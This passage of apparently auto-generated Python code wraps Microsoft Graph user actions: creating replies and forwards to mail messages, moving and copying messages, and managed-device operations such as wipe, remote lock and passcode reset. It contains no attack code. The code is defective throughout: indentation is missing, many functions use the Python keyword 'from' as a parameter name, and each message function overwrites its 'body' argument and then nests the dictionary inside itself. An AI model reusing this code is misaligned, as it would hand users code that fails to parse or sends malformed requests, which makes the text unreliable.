if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if microsoft_graph_message_to_recipients is not None:
body['message']['to_recipients'] = microsoft_graph_message_to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.create_forward(user_id=user_id,
mail_folder_id=mail_folder_id,
message_id=message_id,
body=body)
def usersactions_usersmailfoldersmessage_create_reply(client,
user_id,
mail_folder_id,
message_id,
body,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if to_recipients is not None:
body['message']['to_recipients'] = to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.create_reply(user_id=user_id,
mail_folder_id=mail_folder_id,
message_id=message_id,
body=body)
def usersactions_usersmailfoldersmessage_create_reply_all(client,
user_id,
mail_folder_id,
message_id,
body,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if to_recipients is not None:
body['message']['to_recipients'] = to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.create_reply_all(user_id=user_id,
mail_folder_id=mail_folder_id,
message_id=message_id,
body=body)
def usersactions_usersmailfoldersmessage_forward(client,
user_id,
mail_folder_id,
message_id,
body,
to_recipients=None,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
microsoft_graph_message_to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if to_recipients is not None:
body['to_recipients'] = to_recipients
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if microsoft_graph_message_to_recipients is not None:
body['message']['to_recipients'] = microsoft_graph_message_to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.forward(user_id=user_id,
mail_folder_id=mail_folder_id,
message_id=message_id,
body=body)
def usersactions_usersmailfoldersmessage_move(client,
user_id,
mail_folder_id,
message_id,
destination_id=None):
body = {}
if destination_id is not None:
body['destination_id'] = destination_id
return client.move(user_id=user_id,
mail_folder_id=mail_folder_id,
message_id=message_id,
body=body)
def usersactions_usersmailfoldersmessage_reply(client,
user_id,
mail_folder_id,
message_id,
body,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if to_recipients is not None:
body['message']['to_recipients'] = to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.reply(user_id=user_id,
mail_folder_id=mail_folder_id,
message_id=message_id,
body=body)
def usersactions_usersmailfoldersmessage_reply_all(client,
user_id,
mail_folder_id,
message_id,
body,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if to_recipients is not None:
body['message']['to_recipients'] = to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.reply_all(user_id=user_id,
mail_folder_id=mail_folder_id,
message_id=message_id,
body=body)
def usersactions_usersmailfoldersmessage_send(client,
user_id,
mail_folder_id,
message_id):
return client.send(user_id=user_id,
mail_folder_id=mail_folder_id,
message_id=message_id)
def usersactions_usersmailfolder_copy(client,
user_id,
mail_folder_id,
destination_id=None):
body = {}
if destination_id is not None:
body['destination_id'] = destination_id
return client.copy(user_id=user_id,
mail_folder_id=mail_folder_id,
body=body)
def usersactions_usersmailfolder_move(client,
user_id,
mail_folder_id,
destination_id=None):
body = {}
if destination_id is not None:
body['destination_id'] = destination_id
return client.move(user_id=user_id,
mail_folder_id=mail_folder_id,
body=body)
def usersactions_usersmanageddevice_bypass_activation_lock(client,
user_id,
managed_device_id):
return client.bypass_activation_lock(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_clean_window_device(client,
user_id,
managed_device_id,
keep_user_data=None):
body = {}
if keep_user_data is not None:
body['keep_user_data'] = keep_user_data
else:
body['keep_user_data'] = False
return client.clean_windows_device(user_id=user_id,
managed_device_id=managed_device_id,
body=body)
def usersactions_usersmanageddevice_delete_user_from_shared_apple_device(client,
user_id,
managed_device_id,
user_principal_name=None):
body = {}
if user_principal_name is not None:
body['user_principal_name'] = user_principal_name
return client.delete_user_from_shared_apple_device(user_id=user_id,
managed_device_id=managed_device_id,
body=body)
def usersactions_usersmanageddevice_disable_lost_mode(client,
user_id,
managed_device_id):
return client.disable_lost_mode(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_locate_device(client,
user_id,
managed_device_id):
return client.locate_device(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_logout_shared_apple_device_active_user(client,
user_id,
managed_device_id):
return client.logout_shared_apple_device_active_user(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_reboot_now(client,
user_id,
managed_device_id):
return client.reboot_now(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_recover_passcode(client,
user_id,
managed_device_id):
return client.recover_passcode(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_remote_lock(client,
user_id,
managed_device_id):
return client.remote_lock(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_request_remote_assistance(client,
user_id,
managed_device_id):
return client.request_remote_assistance(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_reset_passcode(client,
user_id,
managed_device_id):
return client.reset_passcode(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_retire(client,
user_id,
managed_device_id):
return client.retire(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_shut_down(client,
user_id,
managed_device_id):
return client.shut_down(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_sync_device(client,
user_id,
managed_device_id):
return client.sync_device(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_update_window_device_account(client,
user_id,
managed_device_id,
calendar_sync_enabled=None,
device_account_email=None,
exchange_server=None,
password_rotation_enabled=None,
session_initiation_protocal_address=None,
password=None):
body = {}
body['update_windows_device_account_action_parameter'] = {}
if calendar_sync_enabled is not None:
body['update_windows_device_account_action_parameter']['calendar_sync_enabled'] = calendar_sync_enabled
if device_account_email is not None:
body['update_windows_device_account_action_parameter']['device_account_email'] = device_account_email
if exchange_server is not None:
body['update_windows_device_account_action_parameter']['exchange_server'] = exchange_server
if password_rotation_enabled is not None:
body['update_windows_device_account_action_parameter']['password_rotation_enabled'] = password_rotation_enabled
if session_initiation_protocal_address is not None:
body['update_windows_device_account_action_parameter']['session_initiation_protocal_address'] = session_initiation_protocal_address
body['update_windows_device_account_action_parameter']['device_account'] = {}
if password is not None:
body['update_windows_device_account_action_parameter']['device_account']['password'] = password
if len(body['update_windows_device_account_action_parameter']['device_account']) == 0:
del body['update_windows_device_account_action_parameter']['device_account']
return client.update_windows_device_account(user_id=user_id,
managed_device_id=managed_device_id,
body=body)
def usersactions_usersmanageddevice_window_defender_scan(client,
user_id,
managed_device_id,
quick_scan=None):
body = {}
if quick_scan is not None:
body['quick_scan'] = quick_scan
else:
body['quick_scan'] = False
return client.windows_defender_scan(user_id=user_id,
managed_device_id=managed_device_id,
body=body)
def usersactions_usersmanageddevice_window_defender_update_signature(client,
user_id,
managed_device_id):
return client.windows_defender_update_signatures(user_id=user_id,
managed_device_id=managed_device_id)
def usersactions_usersmanageddevice_wipe(client,
user_id,
managed_device_id,
keep_enrollment_data=None,
keep_user_data=None,
mac_os_unlock_code=None):
body = {}
if keep_enrollment_data is not None:
body['keep_enrollment_data'] = keep_enrollment_data
else:
body['keep_enrollment_data'] = False
if keep_user_data is not None:
body['keep_user_data'] = keep_user_data
else:
body['keep_user_data'] = False
if mac_os_unlock_code is not None:
body['mac_os_unlock_code'] = mac_os_unlock_code
return client.wipe(user_id=user_id,
managed_device_id=managed_device_id,
body=body)
def usersactions_usersmessagesattachment_create_upload_session(client,
user_id,
message_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
message_id=message_id,
body=body)
def usersactions_usersmessage_copy(client,
user_id,
message_id,
destination_id=None):
body = {}
if destination_id is not None:
body['destination_id'] = destination_id
return client.copy(user_id=user_id,
message_id=message_id,
body=body)
def usersactions_usersmessage_create_forward(client,
user_id,
message_id,
body,
to_recipients=None,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
microsoft_graph_message_to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if to_recipients is not None:
body['to_recipients'] = to_recipients
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if microsoft_graph_message_to_recipients is not None:
body['message']['to_recipients'] = microsoft_graph_message_to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.create_forward(user_id=user_id,
message_id=message_id,
body=body)
def usersactions_usersmessage_create_reply(client,
user_id,
message_id,
body,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if to_recipients is not None:
body['message']['to_recipients'] = to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.create_reply(user_id=user_id,
message_id=message_id,
body=body)
def usersactions_usersmessage_create_reply_all(client,
user_id,
message_id,
body,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if to_recipients is not None:
body['message']['to_recipients'] = to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
